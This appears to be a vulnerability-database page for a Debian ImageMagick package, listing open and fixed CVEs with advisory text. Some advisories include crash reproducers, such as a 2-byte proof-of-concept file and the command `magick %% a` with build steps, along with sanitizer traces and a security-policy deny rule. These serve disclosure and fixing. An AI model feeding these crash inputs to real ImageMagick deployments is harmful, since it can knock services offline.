Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie
purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie
Next non-vulnerable version 8:7.1.1.43+dfsg1-1+deb13u6
Latest non-vulnerable version 8:7.1.2.18+dfsg1-1
Risk 3.4
Vulnerabilities affecting this package (4)
Vulnerability Summary Fixed by
VCID-a2qm-vkc3-qkd5
Aliases:
CVE-2025-55160
GHSA-6hgw-6x87-578x
ImageMagick has Undefined Behavior (function-type-mismatch) in CloneSplayTree ## Summary - **Target:** ImageMagick (commit `ecc9a5eb456747374bae8e07038ba10b3d8821b3`) - **Type:** Undefined Behavior (function-type-mismatch) in splay tree cloning callback - **Impact:** Deterministic abort under UBSan (DoS in sanitizer builds). No crash in a non-sanitized build; likely low security impact. - **Trigger:** Minimal **2-byte** input parsed via MagickWand, then coalescing. ## Environment OS: macOS (Apple Silicon/arm64) Homebrew clang version 20.1.8 Target: arm64-apple-darwin24.5.0 Thread model: posix InstalledDir: /opt/homebrew/Cellar/llvm/20.1.8/bin Configuration file: /opt/homebrew/etc/clang/arm64-apple-darwin24.cfg Homebrew ImageMagick: `magick -version` → `ImageMagick 7.1.2-0 Q16-HDRI aarch64` pkg-config: `MagickWand-7.Q16HDRI` version `7.1.2` Library configure flags (capsule build): ./configure --disable-shared --enable-static --without-modules --without-magick-plus-plus --disable-openmp --without-perl --without-x --with-png=yes --without-jpeg --without-tiff --without-xml --without-lqr --without-gslib Harness compile flags: -fsanitize=fuzzer,address,undefined -fno-omit-frame-pointer pkg-config cflags/libs supplied: -I<...>/include/ImageMagick-7 -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 -DMAGICKCORE_CHANNEL_MASK_DEPTH=32 and linked against MagickWand-7.Q16HDRI and MagickCore-7.Q16HDRI Sanitizer runtime: ASan+UBSan defaults. Repro also with `UBSAN_OPTIONS=print_stacktrace=1:halt_on_error=1` ## PoC - **Bytes (hex):** `1c 02` - **Base64:** `HAI=` - **sha256 (optional):** <fill in> ## Reproduction Create PoC: `printf '\x1c\x02' > poc.bin` Option A: libFuzzer harness - Run once: `./harness_ImageMagick_... -runs=1 ./poc.bin` - Expected: UBSan aborts with function-type-mismatch at `MagickCore/splay-tree.c:372:43`. Option B: standalone reproducer (C) - Compile (ensure `PKG_CONFIG_PATH` points to your ImageMagick if needed): /opt/homebrew/opt/llvm/bin/clang -g -O1 -fsanitize=address,undefined $(/opt/homebrew/bin/pkg-config --cflags MagickWand-7.Q16HDRI) repro.c -o repro $(/opt/homebrew/bin/pkg-config --libs MagickWand-7.Q16HDRI) - Run: UBSAN_OPTIONS=print_stacktrace=1:halt_on_error=1 ./repro ./poc.bin Observed output (excerpt) MagickCore/splay-tree.c:372:43: runtime error: call to function ConstantString through pointer to incorrect function type 'void *(*)(void *)' string.c:680: note: ConstantString defined here #0 CloneSplayTree splay-tree.c:372 #1 CloneImageProfiles profile.c:159 #2 CloneImage image.c:832 #3 CoalesceImages layer.c:269 #4 MagickCoalesceImages magick-image.c:1665 #5 main repro.c:XX Root cause The splay tree clone callback expects a function pointer of type `void *(*)(void *)`. ConstantString has a different signature (`char *ConstantString(const char *)`). Calling through the mismatched function type is undefined behavior in C and triggers UBSan’s function-type-mismatch. The path is exercised during coalescing: CloneImage → CloneImageProfiles → CloneSplayTree. Scope Reproduces with a minimal, sanitizer-instrumented, PNG-enabled build and delegates disabled (policy.xml), suggesting the issue is in MagickCore rather than external delegates. Suggested fix (sketch) Use a wrapper that matches the expected callback prototype, or adjust the splay-tree callback typedef for const-correctness. For example: static void *CloneStringShim(const void *p) { return (void *) ConstantString((const char *) p); } /* When setting splay-tree clone_value, use CloneStringShim instead of ConstantString. */ Alternatively, update the clone callback typedefs to use const void* consistently (and return void*) and ensure callers pass a correctly typed wrapper. Artifacts Minimised PoC: attached (poc.bin, 2 bytes; base64 HAI=) Harness source and exact build command (attached) Full UBSan trace (attached) Commit SHA and configure flags (above) Credits Discovered by: Lumina Mescuwa Method: libFuzzer + UBSan Verification - UBSan build: Reproduces with `halt_on_error=1`; aborts at `MagickCore/splay-tree.c:372`. - Non-sanitized Homebrew build (macOS arm64, clang 20.1.8): No crash; repro completes silently.
8:7.1.2.1+dfsg1-1
Affected by 0 other vulnerabilities.
8:7.1.2.16+dfsg1-1
Affected by 3 other vulnerabilities.
8:7.1.2.18+dfsg1-1
Affected by 0 other vulnerabilities.
VCID-jc5m-7rvc-2qg6
Aliases:
CVE-2026-32636
GHSA-gc62-2v5p-qpmp
ImageMagick has a heap-buffer-overflow in NewXMLTree which could result in crash The NewXMLTree method contains a bug that could result in a crash due to an out of write bounds of a single zero byte.
8:7.1.2.18+dfsg1-1
Affected by 0 other vulnerabilities.
VCID-tt6z-t31v-dkdd
Aliases:
CVE-2026-33536
GHSA-8793-7xv6-82cf
ImageMagick has an Out-of-bounds Write via InterpretImageFilename Due to an incorrect return value on certain platforms a pointer is incremented past the end of a buffer that is on the stack and that could result in an out of bounds write. ``` ================================================================= ==48558==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x00016b9b7490 at pc 0x0001046d48ac bp 0x00016b9b31d0 sp 0x00016b9b31c8 WRITE of size 1 at 0x00016b9b7490 thread T0 ```
8:7.1.2.18+dfsg1-1
Affected by 0 other vulnerabilities.
VCID-zvq4-ybph-buga
Aliases:
CVE-2026-33535
GHSA-mw3m-pqr2-qv7c
ImageMagick has an Out-of-Bounds write of a zero byte in its X11 display interaction An out-of-bounds write of a zero byte exists in the X11 `display` interaction path that could lead to a crash.
8:7.1.2.18+dfsg1-1
Affected by 0 other vulnerabilities.
Vulnerabilities fixed by this package (715)
Vulnerability Summary Aliases
VCID-1223-kpm6-2fh6 Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-3714
VCID-12j6-qbjn-m3d7 ImageMagick: Memory leak in the ReadPCXImage function CVE-2017-8344
VCID-12rd-dhh3-h3ea ImageMagick: denial of service in cineon parsing component CVE-2019-11470
VCID-152y-9pjj-p7b7 ImageMagick: memory leaks at AcquireMagickMemory because of an error in MagickWand/mogrify.c CVE-2019-13310
VCID-15mv-khzp-fqfk ImageMagick: memory leak in WriteMSLImage of coders/msl.c CVE-2018-18544
VCID-15ny-qqbj-qyfk ImageMagick has infinite loop when writing IPTCTEXT leads to denial of service via crafted profile A crafted profile contain invalid IPTC data may cause an infinite loop when writing it with `IPTCTEXT`. CVE-2026-26066
GHSA-v994-63cg-9wj3
VCID-177y-cbh1-myay ImageMagick: an integer overflow vulnerability in the function TIFFSeekCustomStream in coders/tiff.c CVE-2019-13136
VCID-18rv-b2mg-jbex Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2021-20224
VCID-1a39-qxtg-fkhx security update CVE-2016-10056
VCID-1abc-45xr-5bhb ImageMagick: memory leak in ReadBGRImage in coders/bgr.c. CVE-2018-17967
VCID-1cpn-zvem-v7gt ImageMagick has uninitialized pointer dereference in JBIG decoder An uninitialized pointer dereference vulnerability exists in the JBIG decoder due to a missing check. CVE-2026-28691
GHSA-wj8w-pjxf-9g4f
VCID-1daq-9kb7-eudz ImageMagick: Memory exhaustion in ReadMIFFImage in coders/miff.c CVE-2017-12429
VCID-1e38-tmxy-9kew ImageMagick: memory leak in WriteSGIImage in coders/sgi.c CVE-2018-17965
VCID-1ftp-6fvm-rfez ImageMagick: memory leak in ReadOneJNGImage function in coders/png.c CVE-2018-16640
VCID-1gh4-vs86-aufs ImageMagick: Memory leak in the WriteMPCImage() function CVE-2017-11532
VCID-1gqw-pheb-hfey ImageMagick: Memory leak in the function ReadMATImage CVE-2017-12564
VCID-1kxn-kce4-sufx ImageMagick: Memory leak in the ReadMNGImage function CVE-2017-8345
VCID-1nrq-kzuy-vyfx security update CVE-2017-11446
VCID-1ppp-hukx-syb3 ImageMagick: theoretical out of bound access in magick/colormap-private.h CVE-2014-9839
VCID-1q1g-ses8-wqae ImageMagick: stack-based buffer over-read in WriteWEBPImage in coders/webp.c CVE-2017-17880
VCID-1q97-afut-4ffy ImageMagick: Memory leak in the WriteHISTOGRAMImage() function CVE-2017-11531
VCID-1r3u-6afm-23f2 security update CVE-2016-7526
VCID-1rg8-dsrg-jbet ImageMagick: Memory leak in the ReadAAIImage function CVE-2017-8343
VCID-1v6v-gk53-8ye7 ImageMagick: corrupted (too many colors) psd file CVE-2014-9828
VCID-1x18-b9sa-yygh Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-12692
VCID-1x5f-2jf7-hbb2 ImageMagick: memory leak in ReadMIFFImage in coders/miff.c CVE-2018-14436
VCID-1y2e-akpf-ufbc Multiple vulnerabilities have been discovered in ImageMagick, the worst of which could lead to arbitrary code execution. CVE-2012-1185
VCID-1yte-8nb7-fqaw security update CVE-2016-10057
VCID-23ws-9cmr-jffa security update CVE-2016-8707
VCID-2495-gquz-9bd1 ImageMagick: Memory leak in the ReadBMPImage function CVE-2017-8830
VCID-25zp-duta-2ffk security update CVE-2017-11448
VCID-267c-s4sq-9bfw ImageMagick: Use after free in ReadICCProfile function in coders/jpeg.c CVE-2019-17541
VCID-29r3-kvf4-n3hc ImageMagick: Heap Buffer Over-read in WaveletDenoise when processing small images A heap buffer over-read vulnerability occurs when processing an image with small dimension using the `-wavelet-denoise` operator. ``` ==3693336==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x511000001280 at pc 0x5602c8b0cc75 bp 0x7ffcb105d510 sp 0x7ffcb105d500 READ of size 4 at 0x511000001280 thread T0 ``` CVE-2026-27798
GHSA-qpgx-jfcq-r59f
VCID-2a2h-yk41-qybt Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13134
VCID-2dgn-j4dn-9fcd imagemagick: use of uninitialized value in functionSyncImageSettings in MagickCore/image.c CVE-2019-12979
VCID-2dwv-ndt5-gfg2 ImageMagick: division by zero at MagickCore/geometry.c CVE-2020-27756
VCID-2ea6-uaw4-wba9 ImageMagick: Memory leak in ReadOneJNGImage function in coders\png.c CVE-2017-12641
VCID-2fzg-6h13-s7bk Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13139
VCID-2gw3-qfan-jygd ImageMagick's failure to limit the depth of SVG file reads caused a DoS attack Using Magick to read a malicious SVG file resulted in a DoS attack. CVE-2025-68618
GHSA-p27m-hp98-6637
VCID-2ken-ysm1-2ybw security update CVE-2017-11537
VCID-2m38-vt4m-5ffa ImageMagick: Stack buffer overflow in XPM coder could result in a crash CVE-2020-19667
VCID-2pwb-71f5-8ken Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13058
VCID-2r23-hhkx-9fh6 ImageMagick: double free in WriteEPTImage function in coders/ept.c CVE-2018-8804
VCID-2t4v-16se-7qef ImageMagick: Integer and buffer overflow in coders/icon.c CVE-2015-8895
VCID-2tv8-3fz3-3yfy security update CVE-2016-4563
VCID-2uq7-pcfv-d7hv security update CVE-2016-5689
VCID-2wxd-hmac-4fcv ImageMagick: denial of service in the function ReadOnePNGImage in coders/png.c CVE-2017-17914
VCID-2yeg-fvbe-f3bz Multiple vulnerabilities have been discovered in ImageMagick, the worst of which could lead to arbitrary code execution. CVE-2014-2030
VCID-2zje-ag2v-7kac ImageMagick has heap buffer overflow in WriteXWDImage due to CARD32 arithmetic overflow in bytes_per_line calculation A 32-bit unsigned integer overflow in the XWD (X Windows) encoder can cause an undersized heap buffer allocation. When writing a extremely large image an out of bounds heap write can occur. ``` ================================================================= ==741961==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5020000083dc at pc 0x56553b4c4245 bp 0x7ffd9d20fef0 sp 0x7ffd9d20fee0 WRITE of size 1 at 0x5020000083dc thread T0 ``` CVE-2026-30937
GHSA-qpg4-j99f-8xcg
VCID-3136-6rpy-vbep security update CVE-2017-10995
VCID-32qk-mugj-73h4 security update CVE-2016-7537
VCID-33k9-ygup-9fb3 security update CVE-2016-7538
VCID-38u3-s4ys-bue5 ImageMagick: Memory leak in psd file handling CVE-2016-10058
VCID-38vp-3yf8-aue8 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13769
VCID-39mw-qs6j-83eu security flaw CVE-2006-2440
VCID-3bbh-2exn-m7ac security update CVE-2019-19948
VCID-3cn6-jf51-3qdv Multiple vulnerabilities have been discovered in ImageMagick, possibly resulting in arbitrary code execution or a Denial of Service. CVE-2007-4985
VCID-3dsm-e7ye-wqe1 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13144
VCID-3eje-68bz-k7ej ImageMagick: crash in xpm file handling CVE-2014-9836
VCID-3fa4-xqhq-2fdq security update CVE-2017-11535
VCID-3fzh-1hk1-3ub1 ImageMagick: Memory leak in the function ReadOneJNGImage CVE-2017-12676
VCID-3g7r-1s51-akht ImageMagick: Memory leak in the ReadMTVImage function CVE-2017-8355
VCID-3gtv-1gg5-5fh2 Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-0284
VCID-3ju6-ah7s-suhh ImageMagick: heap-based buffer overflow in ReadPSInfo in coders/ps.c CVE-2019-17540
VCID-3pky-3t1q-v3av security update CVE-2017-12428
VCID-3pw2-zq6a-2khx security update CVE-2016-10069
VCID-3qad-mewf-8khz ImageMagick: Memory leak in the WritePDFImage function in coders/pdf.c CVE-2019-7397
VCID-3ubj-wp5c-ruat ImageMagick: NULL pointer dereference in the TIFFIgnoreTags function CVE-2017-14532
VCID-3uv5-g9f4-kyg2 Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-5842
VCID-3vc6-9vhj-ckb2 ImageMagick: Memory Leak in MontageImageCommand function in MagickWand/montage.c CVE-2017-18022
VCID-3yqe-cntb-t3fb ImageMagick: Memory leak in the ReadMATImage function CVE-2017-14533
VCID-3zbe-p6ue-ffe8 ImageMagick: division by zero at MagickCore/segment.c CVE-2020-27765
VCID-41xr-8ryd-z3ew ImageMagick: integer overflow in MagickCore/quantum-export.c CVE-2020-27751
VCID-453d-2nac-jbdc ImageMagick: outside the range of representable values of type 'unsigned long' at MagickCore/statistic.c CVE-2020-27764
VCID-4633-67u6-akg8 ImageMagick: Memory leak in the PersistPixelCache function CVE-2017-14325
VCID-46ey-s7sy-9qby ImageMagick: memory leaks at AcquireMagickMemory due to mishandling the NoSuchImage error in CLIListOperatorImages CVE-2019-13309
VCID-46gw-xunr-jqbp ImageMagick: NULL pointer dereference in the GetVirtualPixels function CVE-2017-14400
VCID-477e-a2hz-aqb9 ImageMagick: memory leak in ReadDCMImage function in coders/dcm.c CVE-2018-11656
VCID-47zb-362f-n3b8 security update CVE-2016-10065
VCID-4az8-8361-7bg2 security update CVE-2019-13305
VCID-4dpv-a4ns-hye2 ImageMagick: Possible arbitrary code execution by loading malicious configuration files or shared libraries CVE-2024-41817
VCID-4dxa-f7vm-7feh ImageMagick: Resource exhaustion in the function ReadPDBImage CVE-2017-12674
VCID-4f97-2smu-6qfc ImageMagick: outside the range of representable values of type 'unsigned char' at MagickCore/quantum.h CVE-2020-27775
VCID-4kxf-5xrh-uue8 ImageMagick: reachable assertion in ReadOneJNGImage in coders/png.c CVE-2018-16749
VCID-4nsq-h8ab-5kcj Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-3715
VCID-4p71-qkjb-97c6 ImageMagick: Division by zero in ConvertXYZToJzazbz() of MagickCore/colorspace.c CVE-2021-20310
VCID-4pzm-24uf-73b6 ImageMagick: Memory leak in the function ReadImage CVE-2017-12675
VCID-4qbq-95vy-k7bv CVE-2007-0770: GraphicsMagick buffer overflow CVE-2007-0770
VCID-4s1v-yhef-uqfx security update CVE-2016-10068
VCID-4s25-p8ea-zkh7 ImageMagick: heap-based buffer overflow in PopShortPixel in MagickCore/quantum-private.h CVE-2020-27752
VCID-4urn-ywwt-ayeg ImageMagick: Memory leak in the ReadMPCImage function CVE-2017-14324
VCID-4yhn-j5se-kfhv ImageMagick: integer overflow in the GetEXIFProperty function in magick/property.c could lead to DoS CVE-2012-1610
VCID-5114-9n17-pkd1 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13768
VCID-54da-fzyt-4ud2 ImageMagick has stack write buffer overflow in MNG encoder A stack buffer overflow vulnerability exists in the MNG encoder. There is a bounds checks missing that could corrupting the stack with attacker-controlled data. ``` ==2265506==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffec4971310 at pc 0x55e671b8a072 bp 0x7ffec4970f70 sp 0x7ffec4970f68 WRITE of size 1 at 0x7ffec4971310 thread T0 ``` CVE-2026-28690
GHSA-7h7q-j33q-hvpf
VCID-569d-6nue-5kbq ImageMagick releases an invalid pointer in BilateralBlur when memory allocation fails The BilateralBlurImage method will allocate a set of double buffers inside AcquireBilateralTLS. But the last element in the set is not properly initialized. This will result in a release of an invalid pointer inside DestroyBilateralTLS when the memory allocation fails. CVE-2026-22770
GHSA-39h3-g67r-7g3c
VCID-56ad-fjzb-bycr security update CVE-2015-8959
VCID-56xz-svu7-eue2 ImageMagick: heap-buffer-overflow in PushCharPixel() in quantum-private.h CVE-2023-3745
VCID-57gx-fkgs-f7cb ImageMagick: denial of service (DoS) in IsWEBPImageLossless function in coders/webp.c CVE-2018-7470
VCID-59yn-uan9-sucn security update CVE-2016-10061
VCID-5a4x-wwha-pufn ImageMagick: heap-based buffer over-read in the function WritePNMImage of coders/pnm.c leading to DoS or information disclosure CVE-2019-11598
VCID-5efq-7fxc-zyet security update CVE-2016-10067
VCID-5fc9-tutn-dubw ImageMagick: memory leak in WritePDBImage in coders/pdb.c CVE-2018-17966
VCID-5gug-qb5f-rkae Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-7799
VCID-5jx9-7bd4-f3hk ImageMagick: Null-Pointer dereference in WriteOnePNGImage function in coders/png.c CVE-2017-11522
VCID-5qyh-zkxd-73c5 ImageMagick: handling of corrupted wpg file CVE-2014-9831
VCID-5r21-bc2f-9fha Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-5010
VCID-5s8n-dfjf-ruey ImageMagick has a Heap Buffer Overflow in InterpretImageFilename # Heap Buffer Overflow in InterpretImageFilename ## Summary A heap buffer overflow was identified in the `InterpretImageFilename` function of ImageMagick. The issue stems from an off-by-one error that causes out-of-bounds memory access when processing format strings containing consecutive percent signs (`%%`). ## Environment - **OS**: Arch Linux (Linux gmkhost 6.14.2-arch1-1 # 1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 18:43:59 +0000 x86_64 GNU/Linux (GNU libc) 2.41) - **Architecture**: x86_64 - **Compiler**: gcc (GCC) 15.1.1 20250425 ## Reproduction ### Build Instructions ```bash # Clone the repository git clone https://github.com/ImageMagick/ImageMagick.git cd ImageMagick git reset --hard 8fff9b4f44d2e8b5cae2bd6db70930a144d15f12 # Build with AddressSanitizer export CFLAGS="-fsanitize=address -g -O1" export CXXFLAGS="-fsanitize=address -g -O1" export LDFLAGS="-fsanitizer=address" ./configure make # Set library path and trigger the crash export LD_LIBRARY_PATH="$(pwd)/MagickWand/.libs:$(pwd)/MagickCore/.libs:$LD_LIBRARY_PATH" ./utilities/.libs/magick %% a ``` ### Minimum Trigger ```bash ./utilities/.libs/magick %% [any_output_filename] ``` ## Crash Analysis ### AddressSanitizer Output ``` $ ./utilities/.libs/magick %% a ================================================================= ==2227694==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7037f99e3ad3 at pc 0x741801e81a17 bp 0x7ffd22fa4e00 sp 0x7ffd22fa45b8 READ of size 1 at 0x7037f99e3ad3 thread T0 #0 0x741801e81a16 in strchr /usr/src/debug/gcc/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:746 #1 0x7418013b4f06 in InterpretImageFilename MagickCore/image.c:1674 #2 0x7418012826a3 in ReadImages MagickCore/constitute.c:1040 #3 0x741800e4696b in CLINoImageOperator MagickWand/operation.c:4959 #4 0x741800e64de7 in CLIOption MagickWand/operation.c:5473 #5 0x741800d92edf in ProcessCommandOptions MagickWand/magick-cli.c:653 #6 0x741800d94816 in MagickImageCommand MagickWand/magick-cli.c:1392 #7 0x741800d913e4 in MagickCommandGenesis MagickWand/magick-cli.c:177 #8 0x5ef7a3546638 in MagickMain utilities/magick.c:162 #9 0x5ef7a3546872 in main utilities/magick.c:193 #10 0x7417ff53f6b4 (/usr/lib/libc.so.6+0x276b4) (BuildId: 468e3585c794491a48ea75fceb9e4d6b1464fc35) #11 0x7417ff53f768 in __libc_start_main (/usr/lib/libc.so.6+0x27768) (BuildId: 468e3585c794491a48ea75fceb9e4d6b1464fc35) #12 0x5ef7a3546204 in _start (/home/kforfk/workspace/fuzz_analysis/saigen/ImageMagick/utilities/.libs/magick+0x2204) (BuildId: 96677b60628cf297eaedb3eb17b87000d29403f2) 0x7037f99e3ad3 is located 0 bytes after 3-byte region [0x7037f99e3ad0,0x7037f99e3ad3) allocated by thread T0 here: #0 0x741801f20e15 in malloc /usr/src/debug/gcc/gcc/libsanitizer/asan/asan_malloc_linux.cpp:67 #1 0x7418013e86bc in AcquireMagickMemory MagickCore/memory.c:559 SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/image.c:1674 in InterpretImageFilename Shadow bytes around the buggy address: 0x7037f99e3800: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa 0x7037f99e3880: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa 0x7037f99e3900: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa 0x7037f99e3980: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa 0x7037f99e3a00: fa fa 07 fa fa fa fd fa fa fa fd fa fa fa 00 04 =>0x7037f99e3a80: fa fa 00 04 fa fa 00 00 fa fa[03]fa fa fa 03 fa 0x7037f99e3b00: fa fa 00 01 fa fa fa fa fa fa fa fa fa fa fa fa 0x7037f99e3b80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7037f99e3c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7037f99e3c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7037f99e3d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==2227694==ABORTING ``` ## Root Cause Analysis The first command line argument is interpreted as `MagickImageCommand`: https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/utilities/magick.c#L83 ```c const CommandInfo MagickCommands[] = { MagickCommandSize("magick", MagickFalse, MagickImageCommand), ``` It is invoked here: https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L220 ```c status=command(image_info,argc,argv,&text,exception); ``` The execution then follows this path: - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L1387 - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L586 - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L419 - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/operation.c#L5391 - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/operation.c#L5473 - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/operation.c#L4959 - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/constitute.c#L1009 - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/constitute.c#L1039 - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/image.c#L1649 - https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/image.c#L1674 The execution eventually reaches `InterpretImageFilename` and enters a loop. The `format` variable here is `"%%"`. At this point, it is safe to access `*(format + 2)` but not safe to access `*(format + 3)`. ```c for (p=strchr(format,'%'); p != (char *) NULL; p=strchr(p+1,'%')) { q=(char *) p+1; if (*q == '%') { p=q+1; continue; } ``` The first `strchr` call returns a pointer equal to `format` and assigns it to `p`. Then `q` is initialized with `p + 1` (`format + 1`), and `*q` is `'%'`, so the code enters the if branch. Here, `p` is reassigned to `q + 1` (`format + 2`). In the next iteration, `p + 1` (`format + 3`) is passed to `strchr`, and when `strchr` accesses it, this causes an out-of-bounds read. CVE-2025-53014
GHSA-hm4x-r5hc-794f
VCID-5sxs-wpy9-rqfn Multiple vulnerabilities have been discovered in ImageMagick, possibly resulting in arbitrary code execution or a Denial of Service. CVE-2007-4988
VCID-5u53-66es-vkbv security update CVE-2017-11523
VCID-5uyd-bv33-h7g1 ImageMagick: Heap overflow in sun decoder on 32-bit systems may result in out of bounds write An Integer Overflow vulnerability exists in the sun decoder. On 32-bit systems/builds, a carefully crafted image can lead to an out of bounds heap write. ``` ================================================================= ==1967675==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf190b50e at pc 0x5eae8777 bp 0xffb0fdd8 sp 0xffb0fdd0 WRITE of size 1 at 0xf190b50e thread T0 ``` CVE-2026-25897
GHSA-6j5f-24fw-pqp4
VCID-5xqd-gf3b-4ygw ImageMagick's Security Policy Bypass through config/policy-secure.xml via "fd handler" leads to stdin/stdout access The shipped “secure” security policy includes a rule intended to prevent reading/writing from standard streams: ```xml <policy domain="path" rights="none" pattern="-"/> ``` However, ImageMagick also supports fd:<n> pseudo-filenames (e.g., fd:0, fd:1). This path form is not blocked by the secure policy templates, and therefore bypasses the protection goal of “no stdin/stdout”. To resolve this, users can add the following change to their security policy. ```xml <policy domain="path" rights="none" pattern="fd:*"/> ``` And this will also be included in ImageMagick's more secure policies by default. CVE-2026-25966
GHSA-xwc6-v6g8-pw2h
VCID-5y2n-8d43-vfft security update CVE-2017-6500
VCID-5y72-4n85-qyeb security update CVE-2017-11447
VCID-5zkt-kcgx-a3e2 ImageMagick Has Signed Integer Overflow in SIXEL Decoder, Leading to Memory Corruption A signed integer overflow vulnerability in ImageMagick's SIXEL decoder allows an attacker to trigger memory corruption and denial of service when processing a maliciously crafted SIXEL image file. The vulnerability occurs during buffer reallocation operations where pointer arithmetic using signed 32-bit integers overflows. ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==143838==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 #0 0x7f379d5adb53 (/lib/x86_64-linux-gnu/libc.so.6+0xc4b53) ``` CVE-2026-25970
GHSA-xg29-8ghv-v4xr
VCID-6279-tc7g-g3ag ImageMagick: outside the range of representable values of type 'unsigned int' at MagickCore/quantum-private.h CVE-2020-27768
VCID-62ar-kwbq-nyh3 ImageMagick has memory leak in msl encoder Memory leak exists in `coders/msl.c`. In the `WriteMSLImage` function of the `msl.c` file, resources are allocated. But the function returns early without releasing these allocated resources. ``` ==78983== Memcheck, a memory error detector ==78983== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al. ==78983== Using Valgrind-3.22.0 and LibVEX; rerun with -h for copyright info ==78983== ==78983== 177,196 (13,512 direct, 163,684 indirect) bytes in 1 blocks are definitely lost in loss record 21 of 21 ==78983== at 0x4846828: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ``` CVE-2026-25638
GHSA-gxcx-qjqp-8vjw
VCID-65b6-jbxy-gudt security update CVE-2017-11526
VCID-65cc-fm97-5uad ImageMagick: heap overflow in palm file CVE-2014-9823
VCID-66d8-ts3a-ybev security update CVE-2016-9559
VCID-66hm-jwxw-x3hu ImageMagick: Memory leak in the ReadMATImage function CVE-2017-8348
VCID-68kj-s42g-effd ImageMagick: memory leak in coders/dot.c CVE-2019-16710
VCID-6bf2-uh5z-kfg7 ImageMagick: outside the range of representable values of type 'unsigned long' at coders/palm.c CVE-2020-27761
VCID-6d5n-tv5h-xkhj Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-12877
VCID-6e1q-75mk-pygm security update CVE-2016-7516
VCID-6gh6-3g99-x7hz ImageMagick: Resource exhaustion in WritePixelCachePixels function in coders/xcf.c CVE-2017-12875
